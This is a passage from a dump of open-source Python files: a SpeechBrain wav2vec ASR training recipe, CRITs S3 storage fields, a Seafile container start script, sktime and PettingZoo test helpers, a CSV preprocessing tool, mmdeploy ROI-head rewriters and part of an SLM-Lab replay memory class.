def transform_one(self, x):
return {self._rename(i): xi for i, xi in x.items()}
|
recipes/LibriSpeech/ASR/CTC/train_with_wav2vec.py | mj-kh/speechbrain | 3,913 | 18204 | #!/usr/bin/env/python3
"""Recipe for training a wav2vec-based ctc ASR system with librispeech.
The system employs wav2vec as its encoder. Decoding is performed with
ctc greedy decoder.
To run this recipe, do the following:
> python train_with_wav2vec.py hparams/train_with_wav2vec.yaml
The neural network is trained on CTC likelihood target and character units
are used as basic recognition tokens. Training is performed on the full
LibriSpeech dataset (960 h).
Authors
* <NAME> 2021
* <NAME> 2021
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
"""
import os
import sys
import torch
import logging
import speechbrain as sb
from speechbrain.utils.distributed import run_on_main
from hyperpyyaml import load_hyperpyyaml
from pathlib import Path
logger = logging.getLogger(__name__)
# Define training procedure
class ASR(sb.Brain):
def compute_forward(self, batch, stage):
"""Forward computations from the waveform batches to the output probabilities."""
batch = batch.to(self.device)
wavs, wav_lens = batch.sig
tokens_bos, _ = batch.tokens_bos
wavs, wav_lens = wavs.to(self.device), wav_lens.to(self.device)
# Add augmentation if specified
if stage == sb.Stage.TRAIN:
if hasattr(self.modules, "env_corrupt"):
wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
wavs = torch.cat([wavs, wavs_noise], dim=0)
wav_lens = torch.cat([wav_lens, wav_lens])
tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)
if hasattr(self.hparams, "augmentation"):
wavs = self.hparams.augmentation(wavs, wav_lens)
# Forward pass
feats = self.modules.wav2vec2(wavs)
x = self.modules.enc(feats)
# Compute outputs
p_tokens = None
logits = self.modules.ctc_lin(x)
p_ctc = self.hparams.log_softmax(logits)
if stage != sb.Stage.TRAIN:
p_tokens = sb.decoders.ctc_greedy_decode(
p_ctc, wav_lens, blank_id=self.hparams.blank_index
)
return p_ctc, wav_lens, p_tokens
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss (CTC+NLL) given predictions and targets."""
p_ctc, wav_lens, predicted_tokens = predictions
ids = batch.id
tokens_eos, tokens_eos_lens = batch.tokens_eos
tokens, tokens_lens = batch.tokens
if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
tokens_eos_lens = torch.cat(
[tokens_eos_lens, tokens_eos_lens], dim=0
)
tokens = torch.cat([tokens, tokens], dim=0)
tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)
loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
loss = loss_ctc
if stage != sb.Stage.TRAIN:
# Decode token terms to words
predicted_words = [
"".join(self.tokenizer.decode_ndim(utt_seq)).split(" ")
for utt_seq in predicted_tokens
]
target_words = [wrd.split(" ") for wrd in batch.wrd]
self.wer_metric.append(ids, predicted_words, target_words)
self.cer_metric.append(ids, predicted_words, target_words)
return loss
def fit_batch(self, batch):
"""Train the parameters given a single batch in input"""
predictions = self.compute_forward(batch, sb.Stage.TRAIN)
loss = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)
loss.backward()
if self.check_gradients(loss):
self.wav2vec_optimizer.step()
self.model_optimizer.step()
self.wav2vec_optimizer.zero_grad()
self.model_optimizer.zero_grad()
return loss.detach()
def evaluate_batch(self, batch, stage):
"""Computations needed for validation/test batches"""
predictions = self.compute_forward(batch, stage=stage)
with torch.no_grad():
loss = self.compute_objectives(predictions, batch, stage=stage)
return loss.detach()
def on_stage_start(self, stage, epoch):
"""Gets called at the beginning of each epoch"""
if stage != sb.Stage.TRAIN:
self.cer_metric = self.hparams.cer_computer()
self.wer_metric = self.hparams.error_rate_computer()
def on_stage_end(self, stage, stage_loss, epoch):
"""Gets called at the end of an epoch."""
# Compute/store important stats
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
else:
stage_stats["CER"] = self.cer_metric.summarize("error_rate")
stage_stats["WER"] = self.wer_metric.summarize("error_rate")
# Perform end-of-iteration things, like annealing, logging, etc.
if stage == sb.Stage.VALID:
old_lr_model, new_lr_model = self.hparams.lr_annealing_model(
stage_stats["loss"]
)
old_lr_wav2vec, new_lr_wav2vec = self.hparams.lr_annealing_wav2vec(
stage_stats["loss"]
)
sb.nnet.schedulers.update_learning_rate(
self.model_optimizer, new_lr_model
)
sb.nnet.schedulers.update_learning_rate(
self.wav2vec_optimizer, new_lr_wav2vec
)
self.hparams.train_logger.log_stats(
stats_meta={
"epoch": epoch,
"lr_model": old_lr_model,
"lr_wav2vec": old_lr_wav2vec,
},
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta={"WER": stage_stats["WER"]}, min_keys=["WER"],
)
elif stage == sb.Stage.TEST:
self.hparams.train_logger.log_stats(
stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
test_stats=stage_stats,
)
with open(self.hparams.wer_file, "w") as w:
self.wer_metric.write_stats(w)
def init_optimizers(self):
"Initializes the wav2vec2 optimizer and model optimizer"
self.wav2vec_optimizer = self.hparams.wav2vec_opt_class(
self.modules.wav2vec2.parameters()
)
self.model_optimizer = self.hparams.model_opt_class(
self.hparams.model.parameters()
)
if self.checkpointer is not None:
self.checkpointer.add_recoverable(
"wav2vec_opt", self.wav2vec_optimizer
)
self.checkpointer.add_recoverable("modelopt", self.model_optimizer)
def dataio_prepare(hparams):
"""This function prepares the datasets to be used in the brain class.
It also defines the data processing pipeline through user-defined functions."""
data_folder = hparams["data_folder"]
train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
)
if hparams["sorting"] == "ascending":
# we sort training data to speed up training and get better results.
train_data = train_data.filtered_sorted(sort_key="duration")
# when sorting do not shuffle in dataloader ! otherwise is pointless
hparams["train_dataloader_opts"]["shuffle"] = False
elif hparams["sorting"] == "descending":
train_data = train_data.filtered_sorted(
sort_key="duration", reverse=True
)
# when sorting do not shuffle in dataloader ! otherwise is pointless
hparams["train_dataloader_opts"]["shuffle"] = False
elif hparams["sorting"] == "random":
pass
else:
raise NotImplementedError(
"sorting must be random, ascending or descending"
)
valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["valid_csv"], replacements={"data_root": data_folder},
)
valid_data = valid_data.filtered_sorted(sort_key="duration")
# test is separate
test_datasets = {}
for csv_file in hparams["test_csv"]:
name = Path(csv_file).stem
test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=csv_file, replacements={"data_root": data_folder}
)
test_datasets[name] = test_datasets[name].filtered_sorted(
sort_key="duration"
)
datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()]
# 2. Define audio pipeline:
@sb.utils.data_pipeline.takes("wav")
@sb.utils.data_pipeline.provides("sig")
def audio_pipeline(wav):
sig = sb.dataio.dataio.read_audio(wav)
return sig
sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)
label_encoder = sb.dataio.encoder.CTCTextEncoder()
# 3. Define text pipeline:
@sb.utils.data_pipeline.takes("wrd")
@sb.utils.data_pipeline.provides(
"wrd", "char_list", "tokens_list", "tokens_bos", "tokens_eos", "tokens"
)
def text_pipeline(wrd):
yield wrd
char_list = list(wrd)
yield char_list
tokens_list = label_encoder.encode_sequence(char_list)
yield tokens_list
tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
yield tokens_bos
tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
yield tokens_eos
tokens = torch.LongTensor(tokens_list)
yield tokens
sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)
lab_enc_file = os.path.join(hparams["save_folder"], "label_encoder.txt")
special_labels = {
"bos_label": hparams["bos_index"],
"eos_label": hparams["eos_index"],
"blank_label": hparams["blank_index"],
}
label_encoder.load_or_create(
path=lab_enc_file,
from_didatasets=[train_data],
output_key="char_list",
special_labels=special_labels,
sequence_input=True,
)
# 4. Set output:
sb.dataio.dataset.set_output_keys(
datasets,
["id", "sig", "wrd", "char_list", "tokens_bos", "tokens_eos", "tokens"],
)
return train_data, valid_data, test_datasets, label_encoder
if __name__ == "__main__":
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
# If distributed_launch=True then
# create ddp_group with the right communication protocol
sb.utils.distributed.ddp_init_group(run_opts)
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# Create experiment directory
sb.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# Dataset prep (parsing Librispeech)
from librispeech_prepare import prepare_librispeech # noqa
# multi-gpu (ddp) save data preparation
run_on_main(
prepare_librispeech,
kwargs={
"data_folder": hparams["data_folder"],
"tr_splits": hparams["train_splits"],
"dev_splits": hparams["dev_splits"],
"te_splits": hparams["test_splits"],
"save_folder": hparams["output_folder"],
"merge_lst": hparams["train_splits"],
"merge_name": "train.csv",
"skip_prep": hparams["skip_prep"],
},
)
# here we create the datasets objects as well as tokenization and encoding
train_data, valid_data, test_datasets, label_encoder = dataio_prepare(
hparams
)
# Trainer initialization
asr_brain = ASR(
modules=hparams["modules"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
    # We dynamically add the tokenizer to our brain class.
# NB: This tokenizer corresponds to the one used for the LM!!
asr_brain.tokenizer = label_encoder
# Training
asr_brain.fit(
asr_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["train_dataloader_opts"],
valid_loader_kwargs=hparams["valid_dataloader_opts"],
)
# Testing
for k in test_datasets.keys(): # keys are test_clean, test_other etc
asr_brain.hparams.wer_file = os.path.join(
hparams["output_folder"], "wer_{}.txt".format(k)
)
asr_brain.evaluate(
test_datasets[k], test_loader_kwargs=hparams["test_dataloader_opts"]
)
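# Example invocation (script and hparams file names are illustrative; remaining CLI
# arguments are passed through as overrides to load_hyperpyyaml):
#   python train_with_wav2vec.py hparams/train_with_wav2vec.yaml --data_folder /path/to/LibriSpeech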
|
crits/core/fields.py | dutrow/crits | 738 | 18226 | import datetime
from dateutil.parser import parse
from mongoengine import DateTimeField, FileField
from mongoengine.connection import DEFAULT_CONNECTION_NAME
#from mongoengine.python_support import str_types
from six import string_types as str_types
import io
from django.conf import settings
if settings.FILE_DB == settings.S3:
import crits.core.s3_tools as S3
class CritsDateTimeField(DateTimeField):
"""
Custom MongoEngine DateTimeField. Utilizes a transform such that if the
value passed in is a string we will convert it to a datetime.datetime
object, or if it is set to None we will use the current datetime (useful
when instantiating new objects and wanting the default dates to all be the
current datetime).
"""
def __set__(self, instance, value):
value = self.transform(value)
return super(CritsDateTimeField, self).__set__(instance, value)
def transform(self, value):
if value and isinstance(value, basestring):
return parse(value, fuzzy=True)
elif not value:
return datetime.datetime.now()
else:
return value
class S3Proxy(object):
"""
Custom proxy for MongoEngine which uses S3 to store binaries instead of
GridFS.
"""
def __init__(self, grid_id=None, key=None, instance=None,
db_alias=DEFAULT_CONNECTION_NAME, collection_name='fs'):
self.grid_id = grid_id # Store id for file
self.key = key
self.instance = instance
self.db_alias = db_alias
self.collection_name = collection_name
self.newfile = None # Used for partial writes
self.gridout = None
def __getattr__(self, name):
attrs = ('_fs', 'grid_id', 'key', 'instance', 'db_alias',
'collection_name', 'newfile', 'gridout')
if name in attrs:
return self.__getattribute__(name)
obj = self.get()
if name in dir(obj):
return getattr(obj, name)
raise AttributeError
def __get__(self, instance, value):
return self
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.grid_id)
def delete(self):
# Delete file from S3, FileField still remains
S3.delete_file_s3(self.grid_id,self.collection_name)
self.grid_id = None
self.gridout = None
self._mark_as_changed()
def get(self, id=None):
if id:
self.grid_id = id
if self.grid_id is None:
return None
try:
if self.gridout is None:
self.gridout = io.BytesIO(S3.get_file_s3(self.grid_id, self.collection_name))
return self.gridout
except:
return None
def put(self, file_obj, **kwargs):
if self.grid_id:
raise Exception('This document already has a file. Either delete '
'it or call replace to overwrite it')
self.grid_id = S3.put_file_s3(file_obj, self.collection_name)
self._mark_as_changed()
def read(self, size=-1):
gridout = self.get()
if gridout is None:
return None
else:
try:
return gridout.read(size)
except:
return ""
def _mark_as_changed(self):
"""Inform the instance that `self.key` has been changed"""
if self.instance:
self.instance._mark_as_changed(self.key)
class S3FileField(FileField):
"""
Custom FileField for MongoEngine which utilizes S3.
"""
def __init__(self, db_alias=DEFAULT_CONNECTION_NAME, collection_name="fs",
**kwargs):
super(S3FileField, self).__init__(db_alias, collection_name, **kwargs)
self.proxy_class = S3Proxy
def __set__(self, instance, value):
key = self.name
if ((hasattr(value, 'read') and not
isinstance(value, self.proxy_class)) or isinstance(value, str_types)):
# using "FileField() = file/string" notation
grid_file = instance._data.get(self.name)
# If a file already exists, delete it
if grid_file:
try:
grid_file.delete()
except:
pass
# Create a new file with the new data
grid_file.put(value)
else:
# Create a new proxy object as we don't already have one
instance._data[key] = self.proxy_class(key=key, instance=instance,
collection_name=self.collection_name)
instance._data[key].put(value)
else:
instance._data[key] = value
instance._mark_as_changed(key)
def getFileField(db_alias=DEFAULT_CONNECTION_NAME, collection_name="fs", **kwargs):
"""
Determine if the admin has configured CRITs to utilize GridFS or S3 for
binary storage.
"""
if settings.FILE_DB == settings.GRIDFS:
return FileField(db_alias, collection_name, **kwargs)
elif settings.FILE_DB == settings.S3:
return S3FileField(db_alias, collection_name, **kwargs)
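# A minimal usage sketch (illustrative; ``Sample`` and its fields are hypothetical and
# not part of this module). The helpers above are intended for MongoEngine document
# definitions, with settings.FILE_DB selecting GridFS or S3 as the binary backend:
# class Sample(Document):
#     created = CritsDateTimeField(default=datetime.datetime.now)
#     filedata = getFileField(collection_name='objects')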
|
cluster/image/pro_seafile_7.1/scripts_7.1/start.py | chaosbunker/seafile-docker | 503 | 18229 | #!/usr/bin/env python3
#coding: UTF-8
import os
import sys
import time
import json
import argparse
from os.path import join, exists, dirname
from upgrade import check_upgrade
from utils import call, get_conf, get_script, get_command_output, get_install_dir
installdir = get_install_dir()
topdir = dirname(installdir)
def watch_controller():
maxretry = 4
retry = 0
while retry < maxretry:
controller_pid = get_command_output('ps aux | grep seafile-controller | grep -v grep || true').strip()
garbage_collector_pid = get_command_output('ps aux | grep /scripts/gc.sh | grep -v grep || true').strip()
if not controller_pid and not garbage_collector_pid:
retry += 1
else:
retry = 0
time.sleep(5)
print('seafile controller exited unexpectedly.')
sys.exit(1)
def main(args):
call('/scripts/create_data_links.sh')
# check_upgrade()
os.chdir(installdir)
call('service nginx start &')
admin_pw = {
'email': get_conf('SEAFILE_ADMIN_EMAIL', '<EMAIL>'),
'password': get_conf('SEAFILE_ADMIN_PASSWORD', '<PASSWORD>'),
}
password_file = join(topdir, 'conf', 'admin.txt')
with open(password_file, 'w+') as fp:
json.dump(admin_pw, fp)
try:
call('{} start'.format(get_script('seafile.sh')))
call('{} start'.format(get_script('seahub.sh')))
if args.mode == 'backend':
call('{} start'.format(get_script('seafile-background-tasks.sh')))
finally:
if exists(password_file):
os.unlink(password_file)
print('seafile server is running now.')
try:
watch_controller()
except KeyboardInterrupt:
print('Stopping seafile server.')
sys.exit(0)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Seafile cluster start script')
parser.add_argument('--mode')
main(parser.parse_args())
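# Example invocation inside the container (path and mode are illustrative):
#   python /scripts/start.py --mode backend
# Passing --mode backend additionally starts seafile-background-tasks.sh; any other
# value only starts nginx, seafile and seahub.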
|
sktime/datatypes/_panel/_examples.py | marcio55afr/sktime | 5,349 | 18238 | <filename>sktime/datatypes/_panel/_examples.py<gh_stars>1000+
# -*- coding: utf-8 -*-
"""Example generation for testing.
Exports dict of examples, useful for testing as fixtures.
example_dict: dict indexed by triple
1st element = mtype - str
2nd element = considered as this scitype - str
3rd element = int - index of example
elements are data objects, considered examples for the mtype
all examples with same index are considered "same" on scitype content
if None, indicates that representation is not possible
example_dict_lossy: dict of bool indexed by triple
1st element = mtype - str
2nd element = considered as this scitype - str
3rd element = int - index of example
elements are bool, indicate whether representation has information removed
all examples with same index are considered "same" on scitype content
overall, conversions from non-lossy representations to any other ones
    should yield the element exactly, identically (given same index)
"""
import pandas as pd
import numpy as np
example_dict = dict()
example_dict_lossy = dict()
###
X = np.array(
[[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 55, 6]], [[1, 2, 3], [42, 5, 6]]],
dtype=np.int64,
)
example_dict[("numpy3D", "Panel", 0)] = X
example_dict_lossy[("numpy3D", "Panel", 0)] = False
cols = [f"var_{i}" for i in range(2)]
Xlist = [
pd.DataFrame([[1, 4], [2, 5], [3, 6]], columns=cols),
pd.DataFrame([[1, 4], [2, 55], [3, 6]], columns=cols),
pd.DataFrame([[1, 42], [2, 5], [3, 6]], columns=cols),
]
example_dict[("df-list", "Panel", 0)] = Xlist
example_dict_lossy[("df-list", "Panel", 0)] = False
cols = ["instances", "timepoints"] + [f"var_{i}" for i in range(2)]
Xlist = [
pd.DataFrame([[0, 0, 1, 4], [0, 1, 2, 5], [0, 2, 3, 6]], columns=cols),
pd.DataFrame([[1, 0, 1, 4], [1, 1, 2, 55], [1, 2, 3, 6]], columns=cols),
pd.DataFrame([[2, 0, 1, 42], [2, 1, 2, 5], [2, 2, 3, 6]], columns=cols),
]
X = pd.concat(Xlist)
X = X.set_index(["instances", "timepoints"])
example_dict[("pd-multiindex", "Panel", 0)] = X
example_dict_lossy[("pd-multiindex", "Panel", 0)] = False
cols = [f"var_{i}" for i in range(2)]
X = pd.DataFrame(columns=cols, index=[0, 1, 2])
X["var_0"] = pd.Series(
[pd.Series([1, 2, 3]), pd.Series([1, 2, 3]), pd.Series([1, 2, 3])]
)
X["var_1"] = pd.Series(
[pd.Series([4, 5, 6]), pd.Series([4, 55, 6]), pd.Series([42, 5, 6])]
)
example_dict[("nested_univ", "Panel", 0)] = X
example_dict_lossy[("nested_univ", "Panel", 0)] = False
|
pettingzoo/test/max_cycles_test.py | RedTachyon/PettingZoo | 846 | 18244 | <filename>pettingzoo/test/max_cycles_test.py
import numpy as np
def max_cycles_test(mod):
max_cycles = 4
parallel_env = mod.parallel_env(max_cycles=max_cycles)
observations = parallel_env.reset()
dones = {agent: False for agent in parallel_env.agents}
test_cycles = max_cycles + 10 # allows environment to do more than max_cycles if it so wishes
for step in range(test_cycles):
actions = {agent: parallel_env.action_space(agent).sample() for agent in parallel_env.agents if not dones[agent]}
observations, rewards, dones, infos = parallel_env.step(actions)
if all(dones.values()):
break
pstep = step + 1
env = mod.env(max_cycles=max_cycles)
env.reset()
agent_counts = np.zeros(len(env.possible_agents))
for a in env.agent_iter():
# counts agent index
aidx = env.possible_agents.index(a)
agent_counts[aidx] += 1
action = env.action_space(a).sample() if not env.dones[a] else None
env.step(action)
assert max_cycles == pstep
# does not check the minimum value because some agents might be killed before
# all the steps are complete. However, most agents should still be alive
# given a short number of cycles
assert max_cycles == np.max(agent_counts) - 1
assert max_cycles == np.median(agent_counts) - 1
|
solutionbox/structured_data/mltoolbox/_structured_data/preprocess/local_preprocess.py | freyrsae/pydatalab | 198 | 18258 | <gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import collections
import json
import os
import six
import sys
from tensorflow.python.lib.io import file_io
SCHEMA_FILE = 'schema.json'
NUMERICAL_ANALYSIS_FILE = 'stats.json'
CATEGORICAL_ANALYSIS_FILE = 'vocab_%s.csv'
def parse_arguments(argv):
"""Parse command line arguments.
Args:
    argv: list of command line arguments, including program name.
Returns:
An argparse Namespace object.
"""
parser = argparse.ArgumentParser(
description='Runs Preprocessing on structured CSV data.')
parser.add_argument('--input-file-pattern',
type=str,
required=True,
help='Input CSV file names. May contain a file pattern')
parser.add_argument('--output-dir',
type=str,
required=True,
                      help='Google Cloud Storage or local folder in which to place outputs.')
parser.add_argument('--schema-file',
type=str,
required=True,
help=('BigQuery json schema file'))
args = parser.parse_args(args=argv[1:])
# Make sure the output folder exists if local folder.
file_io.recursive_create_dir(args.output_dir)
return args
def run_numerical_categorical_analysis(args, schema_list):
"""Makes the numerical and categorical analysis files.
Args:
args: the command line args
schema_list: python object of the schema json file.
Raises:
ValueError: if schema contains unknown column types.
"""
header = [column['name'] for column in schema_list]
input_files = file_io.get_matching_files(args.input_file_pattern)
# Check the schema is valid
for col_schema in schema_list:
col_type = col_schema['type'].lower()
if col_type != 'string' and col_type != 'integer' and col_type != 'float':
raise ValueError('Schema contains an unsupported type %s.' % col_type)
# initialize the results
def _init_numerical_results():
return {'min': float('inf'),
'max': float('-inf'),
'count': 0,
'sum': 0.0}
numerical_results = collections.defaultdict(_init_numerical_results)
categorical_results = collections.defaultdict(set)
# for each file, update the numerical stats from that file, and update the set
# of unique labels.
for input_file in input_files:
with file_io.FileIO(input_file, 'r') as f:
for line in f:
parsed_line = dict(zip(header, line.strip().split(',')))
for col_schema in schema_list:
col_name = col_schema['name']
col_type = col_schema['type']
if col_type.lower() == 'string':
categorical_results[col_name].update([parsed_line[col_name]])
else:
# numerical column.
# if empty, skip
if not parsed_line[col_name].strip():
continue
numerical_results[col_name]['min'] = (
min(numerical_results[col_name]['min'],
float(parsed_line[col_name])))
numerical_results[col_name]['max'] = (
max(numerical_results[col_name]['max'],
float(parsed_line[col_name])))
numerical_results[col_name]['count'] += 1
numerical_results[col_name]['sum'] += float(parsed_line[col_name])
# Update numerical_results to just have min/min/mean
for col_schema in schema_list:
if col_schema['type'].lower() != 'string':
col_name = col_schema['name']
mean = numerical_results[col_name]['sum'] / numerical_results[col_name]['count']
del numerical_results[col_name]['sum']
del numerical_results[col_name]['count']
numerical_results[col_name]['mean'] = mean
# Write the numerical_results to a json file.
file_io.write_string_to_file(
os.path.join(args.output_dir, NUMERICAL_ANALYSIS_FILE),
json.dumps(numerical_results, indent=2, separators=(',', ': ')))
# Write the vocab files. Each label is on its own line.
for name, unique_labels in six.iteritems(categorical_results):
labels = '\n'.join(list(unique_labels))
file_io.write_string_to_file(
os.path.join(args.output_dir, CATEGORICAL_ANALYSIS_FILE % name),
labels)
def run_analysis(args):
"""Builds an analysis files for training."""
# Read the schema and input feature types
schema_list = json.loads(
file_io.read_file_to_string(args.schema_file))
run_numerical_categorical_analysis(args, schema_list)
# Also save a copy of the schema in the output folder.
file_io.copy(args.schema_file,
os.path.join(args.output_dir, SCHEMA_FILE),
overwrite=True)
def main(argv=None):
args = parse_arguments(sys.argv if argv is None else argv)
run_analysis(args)
if __name__ == '__main__':
main()
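# Example invocation (paths are illustrative):
#   python local_preprocess.py \
#     --input-file-pattern=./data/train-*.csv \
#     --output-dir=./analysis_output \
#     --schema-file=./schema.json
# This writes stats.json, one vocab_<column>.csv per string column, and a copy of the
# schema file into --output-dir.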
|
mne/datasets/kiloword/__init__.py | fmamashli/mne-python | 1,953 | 18270 | """MNE visual_92_categories dataset."""
from .kiloword import data_path, get_version
|
mmdeploy/codebase/mmdet/models/roi_heads/test_mixins.py | zhiqwang/mmdeploy | 746 | 18328 | <reponame>zhiqwang/mmdeploy<filename>mmdeploy/codebase/mmdet/models/roi_heads/test_mixins.py<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmdeploy.core import FUNCTION_REWRITER
@FUNCTION_REWRITER.register_rewriter(
'mmdet.models.roi_heads.test_mixins.BBoxTestMixin.simple_test_bboxes')
def bbox_test_mixin__simple_test_bboxes(ctx,
self,
x,
img_metas,
proposals,
rcnn_test_cfg,
rescale=False):
"""Rewrite `simple_test_bboxes` of `BBoxTestMixin` for default backend.
1. This function eliminates the batch dimension to get forward bbox
results, and recover batch dimension to calculate final result
for deployment.
2. This function returns detection result as Tensor instead of numpy
array.
Args:
ctx (ContextCaller): The context with additional information.
self: The instance of the original class.
x (tuple[Tensor]): Features from upstream network. Each
has shape (batch_size, c, h, w).
img_metas (list[dict]): Meta information of images.
proposals (list(Tensor)): Proposals from rpn head.
Each has shape (num_proposals, 5), last dimension
5 represent (x1, y1, x2, y2, score).
rcnn_test_cfg (obj:`ConfigDict`): `test_cfg` of R-CNN.
rescale (bool): If True, return boxes in original image space.
Default: False.
Returns:
tuple[Tensor, Tensor]: (det_bboxes, det_labels), `det_bboxes` of
shape [N, num_det, 5] and `det_labels` of shape [N, num_det].
"""
rois = proposals
batch_index = torch.arange(
rois.shape[0], device=rois.device).float().view(-1, 1, 1).expand(
rois.size(0), rois.size(1), 1)
rois = torch.cat([batch_index, rois[..., :4]], dim=-1)
batch_size = rois.shape[0]
num_proposals_per_img = rois.shape[1]
# Eliminate the batch dimension
rois = rois.view(-1, 5)
bbox_results = self._bbox_forward(x, rois)
cls_score = bbox_results['cls_score']
bbox_pred = bbox_results['bbox_pred']
# Recover the batch dimension
rois = rois.reshape(batch_size, num_proposals_per_img, rois.size(-1))
cls_score = cls_score.reshape(batch_size, num_proposals_per_img,
cls_score.size(-1))
bbox_pred = bbox_pred.reshape(batch_size, num_proposals_per_img,
bbox_pred.size(-1))
det_bboxes, det_labels = self.bbox_head.get_bboxes(
rois,
cls_score,
bbox_pred,
img_metas[0]['img_shape'],
None,
rescale=rescale,
cfg=rcnn_test_cfg)
return det_bboxes, det_labels
@FUNCTION_REWRITER.register_rewriter(
'mmdet.models.roi_heads.test_mixins.MaskTestMixin.simple_test_mask')
def mask_test_mixin__simple_test_mask(ctx, self, x, img_metas, det_bboxes,
det_labels, **kwargs):
"""Rewrite `simple_test_mask` of `BBoxTestMixin` for default backend.
This function returns detection result as Tensor instead of numpy
array.
Args:
ctx (ContextCaller): The context with additional information.
self: The instance of the original class.
x (tuple[Tensor]): Features from upstream network. Each
has shape (batch_size, c, h, w).
img_metas (list[dict]): Meta information of images.
det_bboxes (tuple[Tensor]): Detection bounding-boxes from features.
Each has shape of (batch_size, num_det, 5).
det_labels (tuple[Tensor]): Detection labels from features. Each
has shape of (batch_size, num_det).
Returns:
tuple[Tensor]: (segm_results), `segm_results` of shape
[N, num_det, roi_H, roi_W].
"""
batch_size = det_bboxes.size(0)
det_bboxes = det_bboxes[..., :4]
batch_index = torch.arange(
det_bboxes.size(0),
device=det_bboxes.device).float().view(-1, 1, 1).expand(
det_bboxes.size(0), det_bboxes.size(1), 1)
mask_rois = torch.cat([batch_index, det_bboxes], dim=-1)
mask_rois = mask_rois.view(-1, 5)
mask_results = self._mask_forward(x, mask_rois)
mask_pred = mask_results['mask_pred']
max_shape = img_metas[0]['img_shape']
num_det = det_bboxes.shape[1]
det_bboxes = det_bboxes.reshape(-1, 4)
det_labels = det_labels.reshape(-1)
segm_results = self.mask_head.get_seg_masks(mask_pred, det_bboxes,
det_labels, self.test_cfg,
max_shape)
segm_results = segm_results.reshape(batch_size, num_det,
segm_results.shape[-2],
segm_results.shape[-1])
return segm_results
|
slm_lab/agent/memory/replay.py | jmribeiro/SLM-Lab | 1,074 | 18351 | <reponame>jmribeiro/SLM-Lab
from collections import deque
from copy import deepcopy
from slm_lab.agent.memory.base import Memory
from slm_lab.lib import logger, math_util, util
from slm_lab.lib.decorator import lab_api
import numpy as np
import pydash as ps
logger = logger.get_logger(__name__)
def sample_next_states(head, max_size, ns_idx_offset, batch_idxs, states, ns_buffer):
'''Method to sample next_states from states, with proper guard for next_state idx being out of bound'''
# idxs for next state is state idxs with offset, modded
ns_batch_idxs = (batch_idxs + ns_idx_offset) % max_size
# if head < ns_idx <= head + ns_idx_offset, ns is stored in ns_buffer
ns_batch_idxs = ns_batch_idxs % max_size
buffer_ns_locs = np.argwhere(
(head < ns_batch_idxs) & (ns_batch_idxs <= head + ns_idx_offset)).flatten()
# find if there is any idxs to get from buffer
to_replace = buffer_ns_locs.size != 0
if to_replace:
# extract the buffer_idxs first for replacement later
# given head < ns_idx <= head + offset, and valid buffer idx is [0, offset)
# get 0 < ns_idx - head <= offset, or equiv.
# get -1 < ns_idx - head - 1 <= offset - 1, i.e.
# get 0 <= ns_idx - head - 1 < offset, hence:
buffer_idxs = ns_batch_idxs[buffer_ns_locs] - head - 1
# set them to 0 first to allow sampling, then replace later with buffer
ns_batch_idxs[buffer_ns_locs] = 0
# guard all against overrun idxs from offset
ns_batch_idxs = ns_batch_idxs % max_size
next_states = util.batch_get(states, ns_batch_idxs)
if to_replace:
# now replace using buffer_idxs and ns_buffer
buffer_ns = util.batch_get(ns_buffer, buffer_idxs)
next_states[buffer_ns_locs] = buffer_ns
return next_states
class Replay(Memory):
'''
Stores agent experiences and samples from them for agent training
An experience consists of
- state: representation of a state
- action: action taken
- reward: scalar value
- next state: representation of next state (should be same as state)
- done: 0 / 1 representing if the current state is the last in an episode
The memory has a size of N. When capacity is reached, the oldest experience
    is deleted to make space for the latest experience.
- This is implemented as a circular buffer so that inserting experiences are O(1)
- Each element of an experience is stored as a separate array of size N * element dim
When a batch of experiences is requested, K experiences are sampled according to a random uniform distribution.
If 'use_cer', sampling will add the latest experience.
e.g. memory_spec
"memory": {
"name": "Replay",
"batch_size": 32,
"max_size": 10000,
"use_cer": true
}
'''
def __init__(self, memory_spec, body):
super().__init__(memory_spec, body)
util.set_attr(self, self.memory_spec, [
'batch_size',
'max_size',
'use_cer',
])
self.is_episodic = False
self.batch_idxs = None
self.size = 0 # total experiences stored
